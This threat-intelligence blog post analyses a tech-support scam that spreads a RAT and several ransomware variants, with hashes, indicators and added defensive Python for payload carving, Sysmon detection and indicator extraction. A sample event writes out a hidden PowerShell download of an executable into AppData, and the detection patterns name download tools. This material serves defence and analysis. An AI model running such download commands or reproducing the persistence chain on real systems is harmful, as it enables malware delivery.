This blog sheds light on a new tech scam in which scammers use deceptive tactics to lure users into paying for a non-existent antivirus solution.
Uncovering the tech scammers' possible involvement in different ransomware attacks.
The IP address of a domain used in this scam is associated with both the TORZON MARKETPLACE, a DarkWeb marketplace, and the “Chai Urgent Care” phishing campaign.
A fake LinkedIn talent acquisition profile was also discovered, using a fabricated persona found on the phishing site.
Overview

Tech scams are fraudulent online schemes in which scammers convince users that their computer or device has a problem and then charge them for unnecessary technical support or services. The scammers often use executable files to carry out the scheme: for instance, they send emails or messages containing phishing links or attachments that are disguised to look legitimate but actually contain malicious software. The malicious application mainly generates fake pop-ups or messages that pressure users into paying for supposed technical support or services. Cyble Research and Intelligence Labs (CRIL) has reported on multiple tech scams in the past; here are some of the notable ones:
https://cyble.com/blog/massive-tech-support-scam-exposed/
https://cyble.com/blog/blue-screen-of-death-scams-target-users-visiting-fake-adult-sites/
CRIL has recently observed a new tech scam campaign. In one instance, scammers set up a site for a non-existent antivirus solution to deceive users into paying for non-existent services. During our analysis, we encountered various ransomware variants that the tech scammers leverage to propagate their fraudulent scheme. A thorough investigation into the phishing site associated with this campaign revealed that its IP address has a history of involvement in various scam campaigns and is even associated with a DarkWeb marketplace.

Campaign Analysis

CRIL uncovered a dropper responsible for distributing several malware payloads, namely CraxsRAT, a downloader, and a variant of Chaos ransomware. The downloader and the ransomware are used to propagate the tech scam. The downloader goes on to fetch four additional payloads; upon execution, each of them steers the victim to the deceptive antivirus website. The figure below shows the infection chain.

Figure 1 – Infection Chain

Initial Dropper

The dropper is a 32-bit .NET executable (SHA256: fbb8f0231c666f7b1bfb9256b60b73bc3f44779eb2865b040ca01a3d0a4e1140). It contains three embedded payloads within its Resources, as depicted in the figure below. When executed, the dropper Gzip-decompresses these payloads, writes them to the %temp% directory, and executes them.

Figure 2 – Embedded Payloads

The following are the details of the payloads.
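One way to triage a dropper of this kind, as an added example that is not Cyble's code or anything taken from the sample: instead of walking the .NET resource table, scan the raw image for the Gzip magic bytes, try to inflate from every hit, and keep whatever decompresses to a PE image. The dropper image below is constructed in memory (two fake MZ blobs, a text resource, and a planted stray magic sequence to exercise the false-positive path); no real sample is embedded, and the file names are hypothetical.

```python
# Added example: carve Gzip-compressed payloads out of a dropper image.
# This is not Cyble's code; the "image" is constructed in memory.
import gzip
import hashlib
import zlib

GZIP_MAGIC = b"\x1f\x8b\x08"  # ID1, ID2, CM=deflate


def inflate_at(data: bytes, offset: int):
    """Inflate one gzip member starting at `offset`.

    Returns (payload, bytes_consumed), or None when the bytes there are not
    a complete, valid gzip stream (stray magic bytes are common in code).
    """
    d = zlib.decompressobj(16 + zlib.MAX_WBITS)  # 16+ selects the gzip wrapper
    try:
        payload = d.decompress(data[offset:])
    except zlib.error:
        return None
    if not d.eof:  # header parsed but no valid trailer: not a real member
        return None
    consumed = len(data) - offset - len(d.unused_data)
    return payload, consumed


def carve_gzip_payloads(data: bytes, pe_only: bool = True):
    """Return a record for every gzip member in `data` (PE images only by default)."""
    found = []
    pos = 0
    while (pos := data.find(GZIP_MAGIC, pos)) != -1:
        res = inflate_at(data, pos)
        if res is None:
            pos += 1          # false hit; keep scanning from the next byte
            continue
        payload, consumed = res
        is_pe = payload[:2] == b"MZ"
        if is_pe or not pe_only:
            found.append({
                "offset": pos,
                "compressed_len": consumed,
                "size": len(payload),
                "is_pe": is_pe,
                "sha256": hashlib.sha256(payload).hexdigest(),
                "payload": payload,
            })
        pos += consumed       # jump past the member so its body is not rescanned
    return found


def build_sample_image() -> bytes:
    """Construct a stand-in dropper image: junk code bytes around three gzip members.

    Two members inflate to PE-like blobs (they start with "MZ"), one is a text
    resource, and a stray 1f 8b 08 sequence with reserved FLG bits set is
    planted so the false-positive path is exercised.
    """
    fake_pe_1 = b"MZ" + b"\x90" * 64 + b"payload-one"
    fake_pe_2 = b"MZ" + b"\x00" * 32 + b"payload-two"
    text_res = b"not a PE, just a config string"
    return (b"CODE" * 8 + gzip.compress(fake_pe_1)
            + b"\x1f\x8b\x08junk" + b"\x00" * 10    # stray magic, not a valid stream
            + gzip.compress(text_res)
            + b"CODE" * 4 + gzip.compress(fake_pe_2) + b"END")


if __name__ == "__main__":
    for hit in carve_gzip_payloads(build_sample_image(), pe_only=False):
        print(f"offset={hit['offset']:5d} size={hit['size']:5d} "
              f"pe={hit['is_pe']} sha256={hit['sha256'][:16]}...")
```

Run against a real dropper, `carve_gzip_payloads(open(path, "rb").read())` yields the inflated payloads with their SHA256 values, which can be compared against the hashes listed on this page. Jumping past each inflated member matters: the deflate body of one member can itself contain the three magic bytes, and rescanning it would produce duplicate or bogus hits.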
Payload Name          Malware
Yotgnbkedhvtxc.exe    CraxsRAT
Vippqmccfq.exe        Downloader
Pwdsueslxagy.exe      Variant of Chaos ransomware
Vippqmccfq.exe - Downloader

This file is a .NET downloader (SHA256: 0860a8f9d5debc37dc997a501c593b0eb5f17d5e4ec27e41bec09c606309c0a5). It retrieves a batch script from its Resources, writes it to the %temp% folder as “Gwpuae.bat,” and runs it. The following illustration presents the code responsible for dropping and running the batch file.

Figure 3 – Drops Batch Script

The batch script downloads additional payloads from a typosquatted domain hosted on GitHub Pages and saves them to the %AppData% directory. The figure below shows the commands the batch script uses to download the additional payloads.

Figure 4 – Downloads Additional Payloads

The batch script attempts to download four payloads, namely Microsoft Services.exe, System.exe, Runtime Broker.exe, and windows.exe, from the same hosting site and executes them. All of these executables point to the same non-existent antivirus site (www[.]bit[.]lysecure-net) and Telegram handle (@securenet_global).

Microsoft Services.exe: Tech Scam Executable

This file (SHA256: d79f5fe23a82b67205037c268f2fed92d727bf4215b20fa21c8a765e20661362) is a 32-bit binary that uses timestomping, an anti-forensic technique in which a file's timestamps are altered to hinder timeline analysis. Upon execution, it overlays a warning message on the victim’s desktop, as depicted in the figure below. The alert is deliberately designed to prevent the user from closing it or accessing other applications on the system. It is, however, a fake alert: it prompts the user to visit a specific website or contact someone via Telegram, likely with malicious intent.

Figure 5 – Alert Message

This executable also establishes persistence by adding an entry to the “SOFTWARE\Microsoft\Windows\CurrentVersion\Run” key, so the file is executed automatically whenever the user logs in or restarts the system. The figure below shows the persistence code.
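The behaviours in this part of the chain (a batch script launched from %temp%, a download that lands in %AppData%, and a Run-key value pointing into a user-writable directory) are each individually noisy but rarely occur together. The detection logic below is an added example, not Cyble's code; it runs three rules over Sysmon-style process-creation (Event ID 1) and registry-value-set (Event ID 13) records. The records are constructed for the example: the user name, SID and download URL (example.invalid) are hypothetical, while Gwpuae.bat, Start.exe and "Microsoft Services.exe" are the names this page reports.

```python
# Added example: detection logic for the dropper -> batch -> download -> Run-key
# chain described above. Not Cyble's code; the event records are constructed.
import re

# Paths a user can write to without elevation; the page's payloads land in both.
USER_WRITABLE = re.compile(r"\\AppData\\(?:Local\\Temp|Roaming)\\", re.IGNORECASE)
BATCH_FROM_TEMP = re.compile(r"\\AppData\\Local\\Temp\\[^\s\"]+\.bat\b", re.IGNORECASE)
DOWNLOAD_VERB = re.compile(
    r"Invoke-WebRequest|\biwr\b|\bwget\b|\bcurl\b|DownloadFile|DownloadString"
    r"|Start-BitsTransfer|\bbitsadmin\b|\bcertutil\b.*-urlcache", re.IGNORECASE)
RUN_KEY = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\", re.IGNORECASE)


def check_event(ev: dict):
    """Return (rule_name, evidence) pairs that fire for one Sysmon-style record."""
    hits = []
    if ev.get("event_id") == 1:                      # process creation
        cmd = ev.get("command_line", "")
        if ev.get("image", "").lower().endswith("\\cmd.exe") and BATCH_FROM_TEMP.search(cmd):
            hits.append(("batch_from_temp", cmd))
        if DOWNLOAD_VERB.search(cmd) and USER_WRITABLE.search(cmd):
            hits.append(("download_to_appdata", cmd))
    elif ev.get("event_id") == 13:                   # registry value set
        target, details = ev.get("target_object", ""), ev.get("details", "")
        if RUN_KEY.search(target) and USER_WRITABLE.search(details):
            hits.append(("run_key_user_writable", f"{target} = {details}"))
    return hits


def evaluate(events):
    """Run every record through the rules and return the alerts raised, in order."""
    return [{"rule": rule, "pid": ev.get("pid"), "evidence": evidence}
            for ev in events for rule, evidence in check_event(ev)]


# Constructed records. The user name, SID and URL are hypothetical; the file
# names Gwpuae.bat, Start.exe and "Microsoft Services.exe" are from the page.
SAMPLE_EVENTS = [
    {"event_id": 1, "pid": 4120, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Users\victim\AppData\Local\Temp\Vippqmccfq.exe",
     "command_line": r'cmd.exe /c "C:\Users\victim\AppData\Local\Temp\Gwpuae.bat"'},
    {"event_id": 1, "pid": 4188, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'powershell.exe -NoP -W Hidden -c "Invoke-WebRequest https://example.invalid/Start.exe '
                     r'-OutFile C:\Users\victim\AppData\Roaming\Start.exe"'},
    {"event_id": 13, "pid": 4210, "image": r"C:\Users\victim\AppData\Roaming\Microsoft Services.exe",
     "target_object": r"HKU\S-1-5-21-1111-2222-3333-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftServices",
     "details": r"C:\Users\victim\AppData\Roaming\Microsoft Services.exe"},
    # Benign: a download that lands in Downloads, not AppData.
    {"event_id": 1, "pid": 5001, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'powershell.exe -c "Invoke-WebRequest https://example.invalid/report.csv '
                     r'-OutFile C:\Users\victim\Downloads\report.csv"'},
    # Benign: a Run value pointing at a machine-wide install location (hypothetical vendor).
    {"event_id": 13, "pid": 5002, "image": r"C:\Program Files\Vendor\Setup.exe",
     "target_object": r"HKU\S-1-5-21-1111-2222-3333-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorUpdater",
     "details": r"C:\Program Files\Vendor\Updater.exe"},
]

if __name__ == "__main__":
    for alert in evaluate(SAMPLE_EVENTS):
        print(f"[{alert['rule']}] pid={alert['pid']} {alert['evidence']}")
```

Two design choices are deliberate. USER_WRITABLE matches only AppData\Local\Temp and AppData\Roaming rather than all of AppData, because legitimate per-user installers (OneDrive, Teams and similar) register Run values under AppData\Local and would otherwise flood the Run-key rule; extend the pattern only together with an allowlist. And the rules are evaluated per record rather than correlated by process tree, which keeps them simple to port to a SIEM; correlating the three alerts on the same user session within a few minutes is the natural next step and is what turns these noisy signals into a high-confidence detection of this chain.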
Figure 6 – Establishing Persistence

System.exe: Chaos ransomware variant

This file (SHA256: c14ba9911b3d9f3f85a600f84538c9ee90dbd627ec3831bb89745a71bc0db16b) is a variant of Chaos ransomware. CRIL has reported on multiple variants of Chaos ransomware in the past; a few of them can be found below:
https://cyble.com/blog/blacksnake-ransomware-emerges-from-chaos-ransomwares-shadow/
https://cyble.com/blog/obsidian-orb-ransomware-demands-gift-cards-as-payment/
https://cyble.com/blog/unveiling-wagner-groups-cyber-recruitment/
Upon execution, the ransomware encrypts files and appends the “.encp” extension to their names. It also drops a ransom note named “READ_ME.txt.” The scammer has customized the ransomware binary so that it steers victims toward the fraudulent antivirus website, as shown below.

Figure 7 – Chaos Ransomware variant

Runtime Broker.exe: LockBit Black Ransomware Variant

This file (SHA256: b38943f777ec2cb42abe5ef35b5d2933ce65e3aa3915d7d62bc1cd75c7586886) is identified as a variant of the LockBit Black ransomware. The variant appears to have been generated with the LockBit Black builder that leaked in 2022. The illustration below shows both the ransom note and the wallpaper used by this strain.

Figure 8 – Variant of LockBit Black Ransomware

windows.exe: Downloader of NoCry ransomware variant

This file (SHA256: f6eaa0d761f364d68443445b43ee4ebf722af3e65319c26bf136cda50a532685) is a .NET downloader. Upon execution, it drops a batch script named “Jdomsoqo.bat” in the %temp% directory and executes it. The figure below shows the code for dropping and executing the batch script.

Figure 9 – Drops a Batch Script

The batch script then downloads a ransomware payload named “Start.exe” using a PowerShell command and saves it in the “AppData” directory. The figure below shows the content of the batch script.

Figure 10 – Content of Batch Script

The ransomware binary “Start.exe” (SHA256: 521357a0f9669de4a9233feeef7a3c5299c51de4a2531c56aacc807c0fd25a6a) is a variant of NoCry ransomware. The figure below shows the ransom note content stored in the binary’s resource section.

Figure 11 – Ransom Note Content

Upon execution, this ransomware encrypts files and renames them with the “.recry” extension. It also changes the desktop background, as shown in the Figure below, and displays the ransom note using .NET forms.
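Every payload in this chain carries its indicators as strings: the Telegram handle and fake antivirus site shared by the four executables, and the ransom extensions and note file name of the Chaos and NoCry variants. Because .NET user strings are stored as UTF-16LE, an ASCII-only strings pass misses most of them. The extractor below is an added example, not Cyble's code; it decodes both encodings from raw bytes and classifies what it finds. The byte blob is constructed, not a real sample: @securenet_global, .encp, .recry and READ_ME.txt are taken from this page, while the URL (example.invalid) is hypothetical.

```python
# Added example: extract scam/ransomware indicators from a .NET sample's strings,
# decoding both ASCII and UTF-16LE. Not Cyble's code; the blob is constructed.
import re

ASCII_RUN = re.compile(rb"[\x20-\x7e]{6,}")
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){6,}")   # .NET #US heap strings are UTF-16LE

CLASSIFIERS = {
    # Lookbehind keeps e-mail addresses (user@host) from counting as handles.
    "telegram_handle": re.compile(r"(?<![\w@])@[A-Za-z][A-Za-z0-9_]{4,31}\b"),
    "telegram_link": re.compile(r"\bt\.me/[A-Za-z0-9_]+", re.IGNORECASE),
    "url": re.compile(r"\b(?:https?|hxxps?)://[^\s\"'<>]+", re.IGNORECASE),
    # Extensions the page reports for the Chaos (.encp) and NoCry (.recry) variants.
    "ransom_extension": re.compile(r"(?<![\w.])\.(?:encp|recry)\b", re.IGNORECASE),
    "ransom_note": re.compile(r"\b(?:READ_ME|READ-ME|HOW_TO_DECRYPT)[\w-]*\.txt\b", re.IGNORECASE),
}


def extract_strings(data: bytes):
    """Yield (encoding, text) for every printable ASCII and UTF-16LE run."""
    for m in ASCII_RUN.finditer(data):
        yield "ascii", m.group().decode("ascii")
    for m in UTF16_RUN.finditer(data):
        yield "utf-16le", m.group().decode("utf-16-le")


def extract_iocs(data: bytes):
    """Return {category: sorted unique matches} over strings in both encodings."""
    found = {}
    for _enc, text in extract_strings(data):
        for category, rx in CLASSIFIERS.items():
            for m in rx.finditer(text):
                found.setdefault(category, set()).add(m.group())
    return {k: sorted(v) for k, v in found.items()}


def build_sample_blob() -> bytes:
    """Constructed stand-in for a .NET image: strings in both encodings around junk.

    The handle, extensions and note name are the page's; the URL is hypothetical.
    """
    u16 = lambda s: s.encode("utf-16-le")
    ascii_part = (b"\x00\x10Telegram: @securenet_global" + b"\x00" * 4
                  + b"READ_ME.txt" + b"\xff" * 3)
    utf16_part = (u16("Your files were encrypted. Extension .encp") + b"\x00\x00"
                  + u16("http://example.invalid/antivirus-activate") + b"\x00\x00"
                  + u16(".recry") + b"\x00\x00" + u16("t.me/securenet_global"))
    return ascii_part + b"\x90" * 7 + utf16_part + b"\x00" * 5


if __name__ == "__main__":
    blob = build_sample_blob()
    print("ASCII-only view:", [t for enc, t in extract_strings(blob) if enc == "ascii"])
    for category, values in extract_iocs(blob).items():
        print(f"{category:17s} {values}")
```

On the constructed blob the ASCII-only view surfaces just the handle and the note name; the ransom extensions, the URL and the t.me link only appear once the UTF-16LE runs are decoded, which is exactly the gap a plain `strings` run leaves on .NET samples. The extension classifier is intentionally narrow (only the two extensions this page reports); widen it per family rather than matching any short dotted token, or every file extension in the binary's own resources becomes a false positive.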